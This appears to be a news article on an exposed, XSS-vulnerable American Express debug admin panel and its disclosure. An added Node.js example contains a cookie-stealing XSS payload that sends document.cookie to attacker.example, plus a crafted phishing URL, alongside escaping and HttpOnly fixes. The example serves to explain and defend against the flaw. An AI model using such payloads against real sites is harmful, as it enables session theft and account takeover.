A developer recently discovered that the designers of the American Express website had left the site's debugging admin panel reachable without authentication, exposing the company and its customers to attack and to the loss of sensitive data.
SecurityWeek reports that the error has been corrected, though it is unclear for just how long the debugging panel was exposed before remediation.
“A little 'oops' that one of the developers left behind unprotected breaches many parts of American Express’ security in one hit. One might say that this mistake is a multikill," said Niklas Femerstrand, the developer who discovered the error.
The error gave attackers a foothold for multiple exploits, including cross-site scripting (XSS) attacks that could steal customers' session cookies and other sensitive data, and with them access to their accounts.
“Understandably developers get sloppy around security implementations in debug features. Ironically, this becomes a direct threat in a case where a company’s developers don’t protect their debugging tools from the public. The debugging tool is vulnerable to XSS and it quickly becomes an issue when the debugging tools are called through unprotected GET parameters,” Femerstrand said.
The error also exposed AmEx customers to account harvesting: because the XSS payload could be carried in an otherwise valid AmEx URL, an attacker could deliver it to targeted victims through email notifications, according to Femerstrand.
“Through cookie stealing, an attacker that is regularly sending phishing emails could instead send legitimate URLs to the AMEX website and harvest user accounts as the victims open the link,” Femerstrand stated in an interview with SecurityWeek.
“An attacker could inject a cookie stealer combined with jQuery’s .hide() and harvest cookies which can, ironically enough, be exploited by using the admin panel provided by sloppy American Express developers," Femerstrand explained in a blog post.
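As an added illustration of the pattern Femerstrand describes above (this is not code from American Express or from his post), the following Node.js script models a hypothetical debug page that reflects a `debug` query parameter into its response. The vulnerable renderer drops the parameter straight into the HTML, so a link on the legitimate host can carry a cookie-stealing payload that hides the debug output with jQuery's `.hide()`; the hardened renderer HTML-escapes the parameter, and the session cookie is issued with `HttpOnly` so that `document.cookie` cannot read it even if a script does run. The host names, the parameter name, the element id and the payload are all assumptions.

```javascript
// Added example, not American Express code: a hypothetical debug endpoint on
// "https://bank.example" that reflects the GET parameter "debug" into the page.

// Minimal HTML escaping for text placed between tags or inside attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Pull the "debug" parameter out of a request URL (decoded, as a server would see it).
function debugParam(requestUrl) {
  return new URL(requestUrl).searchParams.get('debug') || '';
}

// Vulnerable: the raw parameter lands in the response body, so any HTML or
// script in the URL executes in the victim's browser, in the victim's session,
// on the real host.
function renderDebugPageVulnerable(requestUrl) {
  return `<html><body><pre id="dbg">${debugParam(requestUrl)}</pre></body></html>`;
}

// Hardened: the same page with the parameter escaped before insertion.
function renderDebugPageHardened(requestUrl) {
  return `<html><body><pre id="dbg">${escapeHtml(debugParam(requestUrl))}</pre></body></html>`;
}

// Session cookie as the hardened server should issue it. HttpOnly keeps it out
// of document.cookie, so a script that does get injected still cannot read it.
function sessionCookieHeader(value) {
  return `session=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Constructed payload of the kind described in the text: hide the debug output
// so the page looks normal, then ship document.cookie to an attacker-controlled
// host. The attacker hostname is an assumption.
const PAYLOAD =
  "<script>$('#dbg').hide();new Image().src='https://attacker.example/c?'+" +
  'encodeURIComponent(document.cookie)</script>';

// The link a phishing mail would carry: a genuine URL on the legitimate host.
const ATTACK_URL = 'https://bank.example/debug?debug=' + encodeURIComponent(PAYLOAD);

// Crude check used below: is the reflected payload still live markup?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable page reflects a live script tag:',
  containsLiveScript(renderDebugPageVulnerable(ATTACK_URL)));
console.log('hardened page reflects a live script tag:  ',
  containsLiveScript(renderDebugPageHardened(ATTACK_URL)));
console.log('cookie header:', sessionCookieHeader('abc123'));
```

The escaping fixes the injection point, but it is the `HttpOnly` flag that removes cookie theft as an outcome of any XSS the site still has; the two controls are independent and both belong in the fix.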
Femerstrand first contacted AmEx officials about the vulnerability on October 4th, and the company took about two days to remedy the access error, not exactly the prompt response Femerstrand was hoping for after notifying the company of this major security lapse.
“When somebody voluntarily contacts a company and repeatedly mentions words like 'security vulnerability' and 'hacker' one would think the company would act as quickly as possible,” Femerstrand said.